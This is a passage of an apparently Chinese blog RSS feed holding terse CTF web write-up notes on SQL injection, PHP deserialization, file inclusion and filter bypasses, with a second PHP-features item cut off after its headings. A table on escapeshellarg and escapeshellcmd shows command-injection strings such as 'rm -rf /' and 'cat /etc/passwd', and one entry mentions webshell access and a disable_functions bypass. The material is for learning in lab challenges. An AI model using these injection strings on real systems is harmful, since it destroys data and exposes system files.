2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[MRCTF2020]Ez_bypass</b></span></span></h2><div class="notion-text notion-block-211233a6c40b80e0a836e22599e23265">即可</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b80dfb05aff5e34313608" data-id="211233a6c40b80dfb05aff5e34313608"><span><div id="211233a6c40b80dfb05aff5e34313608" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b80dfb05aff5e34313608" title="[网鼎杯 2020 青龙组]AreUSerialz"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[网鼎杯 2020 青龙组]AreUSerialz</b></span></span></h2><div class="notion-text notion-block-211233a6c40b80808f51c24a9e52a7de">可以发现如果要触发flag</div><div class="notion-text notion-block-211233a6c40b80ef8f2bda91b8155097">由于is_valid($s)限制,无法成功获取flag</div><div class="notion-text notion-block-211233a6c40b80e18203c5a65545c044"><b>php7.1+反序列化对类属性不敏感</b></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b80a19eefcbffa0dce3d8" data-id="211233a6c40b80a19eefcbffa0dce3d8"><span><div id="211233a6c40b80a19eefcbffa0dce3d8" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b80a19eefcbffa0dce3d8" title="[NPUCTF2020]ReadlezPHP"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[NPUCTF2020]ReadlezPHP</b></span></span></h2><div class="notion-text notion-block-211233a6c40b80dc95dadb4918a3bd2f">查看源码,发现time.php?source</div><div class="notion-text notion-block-211233a6c40b803d853fc048cdda5009">assert是php之中的断言，如果传入的是字符串则会把它作为php代码执行</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b80d49d9ed8b88b5d8be0" data-id="211233a6c40b80d49d9ed8b88b5d8be0"><span><div id="211233a6c40b80d49d9ed8b88b5d8be0" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b80d49d9ed8b88b5d8be0" title="[BSidesCF 2020]Had a bad day"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[BSidesCF 2020]Had a bad day</b></span></span></h2><div class="notion-text notion-block-211233a6c40b80d697d9e8198f644633">随便点一点发现?category=woofers,猜测直接命令执行,结果显示Sorry, we currently only support woofers and meowers.并且后面会拼接.php尝试截断发现<b>Warning</b>: include()…</div><div class="notion-text notion-block-211233a6c40b8064a170de4ab3c7cc5e">应该就是文件包含,然后直接伪协议</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b80579cc5c0b005bdaff9" data-id="211233a6c40b80579cc5c0b005bdaff9"><span><div id="211233a6c40b80579cc5c0b005bdaff9" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b80579cc5c0b005bdaff9" title="[网鼎杯 2020 朱雀组]phpweb"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[网鼎杯 2020 朱雀组]phpweb</b></span></span></h2><div class="notion-text notion-block-211233a6c40b806a8705e8c950eb0c16">抓包发现参数尝试看目录失败,尝试看文件</div><div class="notion-text notion-block-211233a6c40b80289565f8776defa790">应该是反序列化</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-212233a6c40b802c86a2f3db96801165" data-id="212233a6c40b802c86a2f3db96801165"><span><div id="212233a6c40b802c86a2f3db96801165" class="notion-header-anchor"></div><a class="notion-hash-link" href="#212233a6c40b802c86a2f3db96801165" title="[BJDCTF2020]The mystery of ip"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[BJDCTF2020]The mystery of ip</b></span></span></h2><div class="notion-text notion-block-212233a6c40b80429b94d1ce656118f7">在flag.php看见ip,尝试修改xxf发现会回显修改的值,猜测是ssti</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-21a233a6c40b808e880fc06529db0437" data-id="21a233a6c40b808e880fc06529db0437"><span><div id="21a233a6c40b808e880fc06529db0437" class="notion-header-anchor"></div><a class="notion-hash-link" href="#21a233a6c40b808e880fc06529db0437" title="[极客大挑战 2019]BabySQL"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[极客大挑战 2019]BabySQL</b></span></span></h2><div class="notion-text notion-block-21a233a6c40b8025b9f6eebe172d0eb3">通过1’ 1=2—+发现是字符型注入,尝试发现有3列</div><div class="notion-text notion-block-21a233a6c40b808ba72ec1b843fa7db5">通过爆破发现or and from ,select union where等会被替换为空</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-21d233a6c40b80d19decf12df2f9346b" data-id="21d233a6c40b80d19decf12df2f9346b"><span><div id="21d233a6c40b80d19decf12df2f9346b" class="notion-header-anchor"></div><a class="notion-hash-link" href="#21d233a6c40b80d19decf12df2f9346b" title="[SUCTF 2019]EasySQL"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[SUCTF 2019]EasySQL</b></span></span></h2><div class="notion-text notion-block-21d233a6c40b80228f2ef4b8cf1e1fac">通过爆破发现union,from,and,or,information等被禁</div><div class="notion-text notion-block-21d233a6c40b800fb11cc9acc3f82420">输入1,2,3时发现</div><div class="notion-text notion-block-21d233a6c40b8075b41cd04bc214df95">Array ( [0] =&gt; 1 [1] =&gt; 2 [2] =&gt; 1 )
按理说最后应该是3,但是为什么是1呢</div><div class="notion-text notion-block-21d233a6c40b80d6a8cbe287bae35c90">当查询时进行逻辑运算时会出现这种情况</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-21d233a6c40b80fb8228d1a863cd99ea" data-id="21d233a6c40b80fb8228d1a863cd99ea"><span><div id="21d233a6c40b80fb8228d1a863cd99ea" class="notion-header-anchor"></div><a class="notion-hash-link" href="#21d233a6c40b80fb8228d1a863cd99ea" title="[极客大挑战 2019]LoveSQL"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[极客大挑战 2019]LoveSQL</b></span></span></h2><div class="notion-text notion-block-21d233a6c40b80259784f0fdadcc9db6">判断为字符型注入,闭合符为’,列数为3,使用union注入</div><div class="notion-blank notion-block-21d233a6c40b805c86f5e136da0cfc3c"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-21d233a6c40b80a28c68f68918c8918d" data-id="21d233a6c40b80a28c68f68918c8918d"><span><div id="21d233a6c40b80a28c68f68918c8918d" class="notion-header-anchor"></div><a class="notion-hash-link" href="#21d233a6c40b80a28c68f68918c8918d" title="[GXYCTF2019]BabySQli"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[GXYCTF2019]BabySQli</b></span></span></h2><div class="notion-text notion-block-21d233a6c40b80b19af3e99365d640fc">字符型注入,’闭合,有3列,查看源码发现有大串编码,解密得到:select * from user where username = &#x27;$name’</div><div class="notion-text notion-block-21d233a6c40b80ebbaedfbaf93c8f8a9">传入admin发现会由之前wrong user变为wrong pass 说明有admin账户</div><div class="notion-text notion-block-21d233a6c40b80f4aa78ddef48f384dc">通过</div><div class="notion-text notion-block-21d233a6c40b80e99e9efcc4ce94330f">看一篇wp说直接猜测search.php源码,直接人麻了,翻了几篇博客才发现题目那里可以看源码</div><div class="notion-text notion-block-21d233a6c40b806ea063f8c25507d835">会对传入的密码进行MD5加密然后与数据库的密码对比,若为真就输出flag</div><div class="notion-text notion-block-21d233a6c40b8003a6acdc70aa37e637"><b>联合查询并不存在的数据时，联合查询就会构造一个 虚拟的数据表</b></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-21d233a6c40b80299b7ce83cc866480f" data-id="21d233a6c40b80299b7ce83cc866480f"><span><div id="21d233a6c40b80299b7ce83cc866480f" class="notion-header-anchor"></div><a class="notion-hash-link" href="#21d233a6c40b80299b7ce83cc866480f" title="[安洵杯 2019]easy_web"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[安洵杯 2019]easy_web</b></span></span></h2><div class="notion-text notion-block-21f233a6c40b80fb8e19d8fbcc90f9b0">抓包发现?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=
CyberChef解码发现是555.png尝试读取index.php,进行hex加密然后两次base64</div><div class="notion-text notion-block-21f233a6c40b80eb99f6d912cfa5b2a1">将结果解码</div><div class="notion-text notion-block-21f233a6c40b8081b651ff744e4aa2a2">利用\绕过命令的过滤,由于进行了类型转换,不能使用数组</div><div class="notion-text notion-block-21f233a6c40b805eaae8f85bd517bec8">使用以下进行md5强比较绕过</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-21a233a6c40b80dd989de2038ea55568" data-id="21a233a6c40b80dd989de2038ea55568"><span><div id="21a233a6c40b80dd989de2038ea55568" class="notion-header-anchor"></div><a class="notion-hash-link" href="#21a233a6c40b80dd989de2038ea55568" title="[BJDCTF2020]ZJCTF，不过如此"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[BJDCTF2020]ZJCTF，不过如此</b></span></span></h2><div class="notion-text notion-block-21e233a6c40b80abac01c3059504327e"><b>通过php://input,php://filter进行绕过</b></div><div class="notion-text notion-block-21e233a6c40b805cb05ec2b271271aa5"><b>抓包传入</b></div><div class="notion-text notion-block-21e233a6c40b80c5941bd26185283936">将结果解码</div><div class="notion-blank notion-block-21e233a6c40b8015a635cb34a5fe777b"> </div><div class="notion-text notion-block-21e233a6c40b805eb911d1b18ea5d21d">获取第一个get传入的参数与它的值,通过正则\S*绕过</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-21f233a6c40b80e3a489da51b50d4ef8" data-id="21f233a6c40b80e3a489da51b50d4ef8"><span><div id="21f233a6c40b80e3a489da51b50d4ef8" class="notion-header-anchor"></div><a class="notion-hash-link" href="#21f233a6c40b80e3a489da51b50d4ef8" title="[BUUCTF 2018]Online Tool"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[BUUCTF 2018]Online Tool</b></span></span></h2><table class="notion-simple-table notion-block-21f233a6c40b80de8c1ed7d9ca8ebae9"><tbody><tr class="notion-simple-table-row notion-block-21f233a6c40b808da64fed8693b206a5"><td class="" style="width:120px"><div class="notion-simple-table-cell">函数名</div></td><td class="" style="width:120px"><div class="notion-simple-table-cell">用途</div></td><td class="" style="width:120px"><div class="notion-simple-table-cell">作用对象</div></td><td class="" style="width:120px"><div class="notion-simple-table-cell">示例</div></td><td class="" style="width:120px"><div class="notion-simple-table-cell">处理效果</div></td></tr><tr class="notion-simple-table-row notion-block-21f233a6c40b80c7a394e761640fed23"><td class="" style="width:120px"><div class="notion-simple-table-cell"><code class="notion-inline-code">escapeshellarg()</code></div></td><td class="" style="width:120px"><div class="notion-simple-table-cell"><b>安全转义参数</b></div></td><td class="" style="width:120px"><div class="notion-simple-table-cell">单个参数值</div></td><td class="" style="width:120px"><div class="notion-simple-table-cell"><code class="notion-inline-code">ls &#x27;abc; rm -rf /&#x27;</code></div></td><td class="" style="width:120px"><div class="notion-simple-table-cell">加引号包裹 + 内部转义</div></td></tr><tr class="notion-simple-table-row notion-block-21f233a6c40b80caab0acf4f8f424ca2"><td class="" style="width:120px"><div class="notion-simple-table-cell"><code class="notion-inline-code">escapeshellcmd()</code></div></td><td class="" style="width:120px"><div class="notion-simple-table-cell"><b>安全转义整个命令行</b></div></td><td class="" style="width:120px"><div class="notion-simple-table-cell">整条命令</div></td><td class="" style="width:120px"><div class="notion-simple-table-cell"><code class="notion-inline-code">ls\; cat /etc/passwd</code></div></td><td class="" style="width:120px"><div class="notion-simple-table-cell">特殊字符前加反斜杠</div></td></tr></tbody></table><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-21f233a6c40b80339da8d9dd883e5d3a" data-id="21f233a6c40b80339da8d9dd883e5d3a"><span><div id="21f233a6c40b80339da8d9dd883e5d3a" class="notion-header-anchor"></div><a class="notion-hash-link" href="#21f233a6c40b80339da8d9dd883e5d3a" title="[极客大挑战 2019]RCE ME"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[极客大挑战 2019]RCE ME</b></span></span></h2><div class="notion-text notion-block-21f233a6c40b80b6b09fd558406404de">无数字字母rce,通过取反构造进行绕过</div><div class="notion-text notion-block-21f233a6c40b808ba4bedabd45fcbf1f">使用蚁剑连接,flag在根目录但是看不到,通过插件绕过disable_functions执行/readflag得到flag</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-21f233a6c40b80608c83fddf16549870" data-id="21f233a6c40b80608c83fddf16549870"><span><div id="21f233a6c40b80608c83fddf16549870" class="notion-header-anchor"></div><a class="notion-hash-link" href="#21f233a6c40b80608c83fddf16549870" title="[网鼎杯 2018]Fakebook"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[网鼎杯 2018]Fakebook</b></span></span></h2><div class="notion-text notion-block-21f233a6c40b805986e8cb817aa6727a">注册账号并可以成功登录,发现?no=1尝试命令执行发现</div><div class="notion-text notion-block-21f233a6c40b80b099b6fbf798d7c8c8">[*] query error! (Unknown column &#x27;ls&#x27; in &#x27;where clause&#x27;)</div><div class="notion-text notion-block-21f233a6c40b803787e8e8087b37e7be">是sql注入</div><div class="notion-text notion-block-21f233a6c40b8009a932cb2de29059db">最后发现</div><div class="notion-text notion-block-21f233a6c40b802cbdedc658cc39bc92">sanye4e2e603ad32bb2e1335b383c6d4b9a6d353cca643f2808e389a06cb1af930dd661ba77ad76061192ef5baf562297bcc6aeb5e9580c7f6f7ec6b7a353fc96d03d</div><div class="notion-text notion-block-21f233a6c40b80c082cde54fe4dd715e">O:8:&quot;UserInfo&quot;:3{s:4:&quot;name&quot;;s:5:&quot;sanye&quot;;s:3:&quot;age&quot;;i:18;s:4:&quot;blog&quot;;s:5:&quot;<a target="_blank" rel="noopener noreferrer" class="notion-link" href="http://4.com/">4.com</a>&quot;;}
wp说有robots.txt,得到user.php.bak</div><div class="notion-text notion-block-21f233a6c40b80419088cffde7a9e5ea">通过反序列化写入file://伪协议进行读取flag</div><div class="notion-blank notion-block-21f233a6c40b80549b5fe2e8afd6bb5a"> </div></main></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[学习日记-4(php特性)]]></title>
            <link>https://510517.xyz/article/17c233a6-c40b-800e-8e50-c6f3ea4eaa36</link>
            <guid>https://510517.xyz/article/17c233a6-c40b-800e-8e50-c6f3ea4eaa36</guid>
            <pubDate>Wed, 15 Jan 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-17c233a6c40b800e8e50c6f3ea4eaa36"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b806f9ee5fdf323973ede" data-id="193233a6c40b806f9ee5fdf323973ede"><span><div id="193233a6c40b806f9ee5fdf323973ede" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b806f9ee5fdf323973ede" title="web89"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web89</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b806eafb8cfcf49b23491" data-id="193233a6c40b806eafb8cfcf49b23491"><span><div id="193233a6c40b806eafb8cfcf49b23491" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b806eafb8cfcf49b23491" title="web90"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web90</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b806cba70c5ddc98e45b6" data-id="193233a6c40b806cba70c5ddc98e45b6"><span><div id="193233a6c40b806cba70c5ddc98e45b6" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b806cba70c5ddc98e45b6" title="web91"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web91</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b80918d52d95f1377432a" data-id="193233a6c40b80918d52d95f1377432a"><span><div id="193233a6c40b80918d52d95f1377432a" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b80918d52d95f1377432a" title="web92"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web92</span></span></h2><div class="notion-text notion-block-193233a6c40b8043b935f27bbd25e1b4"><b>相关知识：</b><b><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://blog.csdn.net/qq_47804678/article/details/128814377">强比较“===”/弱比较“==“</a></b></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b8093ad4cf22e2bc84466" data-id="193233a6c40b8093ad4cf22e2bc84466"><span><div id="193233a6c40b8093ad4cf22e2bc84466" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b8093ad4cf22e2bc84466" title="web93"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web93</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-193233a6c40b80149914d8ac948a7a6f" data-id="193233a6c40b80149914d8ac948a7a6f"><span><div id="193233a6c40b80149914d8ac948a7a6f" class="notion-header-anchor"></div><a class="notion-hash-link" href="#193233a6c40b80149914d8ac948a7a6f" title="web94"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 